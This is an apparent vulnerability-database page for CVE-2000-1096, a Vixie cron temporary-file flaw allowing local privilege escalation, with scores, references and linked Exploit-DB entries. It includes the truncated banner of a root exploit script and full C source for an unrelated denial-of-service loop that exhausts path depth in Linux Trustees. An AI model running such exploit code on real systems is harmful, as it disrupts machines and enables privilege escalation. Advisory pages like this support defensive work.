CVE-2000-1096
Published 2001-01-09
CVE-2000-1096: crontab by Paul Vixie uses predictable file names for a temporary file and does not properly ensure that the file is owned by the user executing the crontab -e…
Priority: P4 | 16 | low | 3.7 (CVSS 2.0)
CVSS 2.0 vector: AV:L/AC:H/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.79% (51.5th percentile)
crontab by Paul Vixie uses predictable file names for a temporary file and does not properly ensure that the file is owned by the user executing the crontab -e command, which allows local users with write access to the crontab spool directory to execute arbitrary commands by creating world-writeable temporary files and modifying them while the victim is editing the file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| paul_vixie | vixie_cron | — | — |
No detection rules found.
Exploit-DB
vixie-cron - Local Privilege Escalation
exploitdb·2000-11-21
CVE-2000-1096 vixie-cron - Local Privilege Escalation
---
#!/bin/sh
echo '.-------------------------------------------------------------------------.'
echo '| Marchew Hyperreal Industries ................... |'
echo "| ( ...well, it is just me, but it is more elite to speak as a group... ) |"
echo "\`--------------------------------- presents ------------------------------'"
echo
echo ' * another vixie-cron root sploit by Michal Zalewski * '
echo
echo '.-------------------------------------------------------------------------.'
echo '| This time, it is somewhat more complicated. On some systems, it might |'
echo '| require some tuning, to be slower, but resources-effective. It expects |'
echo '| root (or other choosen user) to do "crontab -e" or "crontab /any/file" |'
echo '| sooner or later, and spo
Exploit-DB
Bray Systems Linux Trustees 1.5 - Long Pathname
exploitdb·2000-04-10
CVE-2000-0274 Bray Systems Linux Trustees 1.5 - Long Pathname
---
// source: https://www.securityfocus.com/bid/1096/info
Bray Systems Linux Trustees is an access control program which manages user permissions similar to implementations of Netware. Requesting an unusually long file or directory path will cause the application to hang. Other processes may also be affected. In order to regain normal functionality, the user must reboot the machine.
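#include <stdio.h>      /* perror */
#include <stdlib.h>     /* exit */
#include <sys/types.h>
#include <sys/stat.h>   /* mkdir */
#include <unistd.h>     /* chdir */

int main(void)
{
    /* Nest directories without bound so the resulting path grows unusually long. */
    while (1) {
        if (mkdir("aaaa", 0777) < 0) {
            perror("mkdir");
            exit(1);
        }
        if (chdir("aaaa") < 0) {
            perror("chdir");
            exit(1);
        }
    }
    return 0;
}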
No writeups or analysis indexed.
References:
http://archives.neohapsis.com/archives/bugtraq/2000-11/0237.html
http://www.securityfocus.com/bid/1960
https://exchange.xforce.ibmcloud.com/vulnerabilities/5543
Published: 2001-01-09